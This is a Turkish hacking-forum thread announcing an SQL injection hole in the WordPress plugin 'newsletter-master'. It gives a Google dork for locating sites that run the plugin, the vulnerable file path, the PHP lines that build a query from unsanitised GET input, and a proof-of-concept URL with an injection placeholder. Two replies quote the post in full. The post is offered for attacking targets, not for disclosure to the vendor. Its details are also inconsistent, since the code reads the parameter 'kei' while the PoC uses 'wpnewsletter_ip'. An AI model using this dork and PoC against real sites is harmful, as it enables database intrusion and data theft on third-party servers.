Neler yeni
Kullanıcı:
Gelişmiş Arama...

Wordpress SQL Inject Vuln Plugin (1 Viewer)

Morningstar

Morningstar 

chmod 0777 god
titan
Mesajlar
735
Credits
32,227
Wordpressin pluginlerinden biri olan newsletter-master SQL inject açığı barındırdığı tespit edildi.

Dork:
inurl:plugins/wordpress-newsletter-master

Vulnerable page:
/wp-content/plugins/wordpress-newsletter-master/newsletter.php


Zaafiyetin kaynaklandığı kod parçası;

Kod: 
Line241: $wpnewsletter_ip = $_GET['kei']; Line243: $wpnewsletter_ip = checkvalid($wpnewsletter_ip); Line247: $sql = "SELECT * FROM `" . $dbprefix . "newsletter_users` WHERE MD5(CONCAT(`email`, `name`)) = '" . $wpnewsletter_ip . "'"; Line249: mysql_query $result = mysql_query($sql);

POC : http://site.com/wp-content/plugins/wordpress-newsletter-master/newsletter.php?wpnewsletter_ip=[SQL Injection]
 
T

temy

uzmannnnn
Mesajlar
810
Credits
338
Anarchosa' Alıntı:
Wordpressin pluginlerinden biri olan newsletter-master SQL inject açığı barındırdığı tespit edildi.

Dork:
inurl:plugins/wordpress-newsletter-master

Vulnerable page:
/wp-content/plugins/wordpress-newsletter-master/newsletter.php


Zaafiyetin kaynaklandığı kod parçası;

Kod: 
Line241: $wpnewsletter_ip = $_GET['kei']; Line243: $wpnewsletter_ip = checkvalid($wpnewsletter_ip); Line247: $sql = "SELECT * FROM `" . $dbprefix . "newsletter_users` WHERE MD5(CONCAT(`email`, `name`)) = '" . $wpnewsletter_ip . "'"; Line249: mysql_query $result = mysql_query($sql);

POC : http://site.com/wp-content/plugins/wordpress-newsletter-master/newsletter.php?wpnewsletter_ip=[SQL Injection]
Genişletmek için tıkla ...
 
GnG

GnG

xxxx.com
majorrr
Mesajlar
10,238
Credits
1,738
Anarchosa' Alıntı:
Wordpressin pluginlerinden biri olan newsletter-master SQL inject açığı barındırdığı tespit edildi.

Dork:
inurl:plugins/wordpress-newsletter-master

Vulnerable page:
/wp-content/plugins/wordpress-newsletter-master/newsletter.php


Zaafiyetin kaynaklandığı kod parçası;

Kod: 
Line241: $wpnewsletter_ip = $_GET['kei']; Line243: $wpnewsletter_ip = checkvalid($wpnewsletter_ip); Line247: $sql = "SELECT * FROM `" . $dbprefix . "newsletter_users` WHERE MD5(CONCAT(`email`, `name`)) = '" . $wpnewsletter_ip . "'"; Line249: mysql_query $result = mysql_query($sql);

POC : http://site.com/wp-content/plugins/wordpress-newsletter-master/newsletter.php?wpnewsletter_ip=[SQL Injection]
Genişletmek için tıkla ...
Eline saglik cano
 
Cevap yazmak için giriş yap yada kayıt ol.

Bu konuyu görüntüleyen kullanıcılar

Toplam: 2 (Kullanıcı: 0, ziyaretçi: 2)

imhateam.org; internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. imhateam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. imhatimi.org; saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. imhateam.org; üyelerinin yaptığı bireysel hack forum faaliyetlerinden imhaTimi sorumlu değildir. Sitelerinize imhateam.org; ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Abuse / İçerik / Şikayet: [email protected]
Hosted by ZeroHost
deneme bonusu veren siteler
Üst